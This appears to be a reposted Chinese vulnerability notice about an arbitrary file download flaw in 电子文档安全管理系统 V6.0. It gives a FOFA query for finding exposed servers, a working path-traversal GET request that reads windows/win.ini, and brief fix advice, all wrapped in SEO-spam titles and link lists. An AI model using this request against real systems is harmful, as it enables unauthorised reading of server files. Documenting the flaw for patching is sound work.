当前位置: 首页 > wzjs >正文

鞍山便民信息平台广州网站排名优化报价

鞍山便民信息平台,广州网站排名优化报价,网页游戏排行傍,会员卡管理系统软件哪个好用免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。 漏洞描述 电子文档安全管理系统 V6.0 reso…

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js" 

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

 

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本 

http://www.dtcms.com/wzjs/461788.html

相关文章:

  • 门户网站html百度搜索数据
  • 面对撞库 网站应该怎么做网站seo优化是什么意思
  • 云起时网站建设我在百度下的订单如何查询
  • 广州番禺桥南做网站企业seo的措施有哪些
  • 杭州北京网站建设公司2023引流软件
  • 网站建设中怎么回事加快百度收录的方法
  • 满城做网站电话推广公司品牌
  • 网站更新提示ui怎末做衡阳seo排名
  • 建设心理网站浏览器老是出现站长工具
  • 网站后台管理系统教程网站建设的六个步骤
  • 网站开发准备流程图网络营销案例分析论文
  • 网站建设需求分析表怎么写企业网页制作
  • 金华网站建设公司手机网页设计
  • wordpress sidebar插件东莞seo网站制作报价
  • 网站建设中的色彩搭配杭州上城区抖音seo有多好
  • 如何建设好政府门户网站指数网站
  • 网站程序开发教程携程: 2023年旅行搜索上涨超900%
  • 云南微网站制作哪家好上海关键词优化推荐
  • 一流的铁岭做网站公司抖音权重查询
  • 北京网站建设华网天下科技公司推广普通话的内容简短
  • 三线城市做网站需求创意设计
  • wordpress社交分享非插件广州seo优化排名推广
  • 免费购物系统桂平seo快速优化软件
  • 做网站最好的公推销
  • 自己怎么做 优惠券网站百度数据研究中心官网
  • 成都网站建设哪家好杭州seo网站推广
  • 那个网站可以做微课全国各大新闻网站投稿
  • 赣州91人才网赣州招聘seo高效优化
  • 鄂尔多斯做网站的公司网站关键词推广价格
  • 独立网站建设流程拓客渠道有哪些